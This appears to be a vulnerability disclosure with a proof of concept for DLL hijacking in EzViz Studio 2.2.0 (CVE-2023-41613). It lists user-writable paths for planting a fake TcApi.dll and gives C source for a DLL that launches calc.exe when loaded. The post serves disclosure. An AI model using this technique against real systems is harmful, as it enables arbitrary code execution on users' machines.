EzViz Studio 2.2.0 DLL Hijacking

`PoC:  
  
*DLL Hijacking via EzViz Studio (Reported by EAFZ from Pythongoras)*  
  
*Author: EAFZ aka myantti3m*  
  
*CVE: **CVE**-2023-41613.*  
  
*Test Environment:*  
  
OS: Windows 11 Pro 64 bit(10.0, Build 2261)  
  
EzViz Studio version: 2.2.0  
  
*Technical Description *  
  
*1. **Technical Description *  
  
EzvizStudio.exe searches for a DLL called TcApi.dll. Because TcApi.dll  
doesn’t exist in any of the paths of the DLL search order. In particular,  
some paths have writable permissions for normal users as:  
  
· C:\Users\<Username>\AppData\Local\Programs\Microsoft VS  
Code\bin\TcApi.dll  
  
· C:\Users\<Username>\AppData\Local\Microsoft\WindowsApps\TcApi.dll  
  
So we can plant “malicious” TcApi.dll inside these directories and wait  
until the application will load it.  
  
*POC*  
  
We created a malicious DLL file (TcApi.dll) and complied it. In our case,  
it opens calc.exe. You can see the code below:  
  
#include <windows.h>  
  
#pragma comment (lib, "user32.lib")  
  
#include "pch.h"  
  
#include <iostream>  
  
#include <stdlib.h>  
  
BOOL APIENTRY DllMain(HMODULE hModule,  
  
DWORD nReason, LPVOID lpReserved) {  
  
switch (nReason) {  
  
case DLL_PROCESS_ATTACH:  
  
system("calc.exe");  
  
  
  
break;  
  
case DLL_PROCESS_DETACH:  
  
break;  
  
case DLL_THREAD_ATTACH:  
  
break;  
  
case DLL_THREAD_DETACH:  
  
break;  
  
}  
  
return TRUE;  
  
}  
  
Copy “malicious” TcApi.dll to  
  
C:\Users\<Username>\AppData\Local\Microsoft\WindowsApps\TcApi.dll  
  
If we run the EzVizStudio again, the code from the “malicious” DLL runs  
  
  
  
`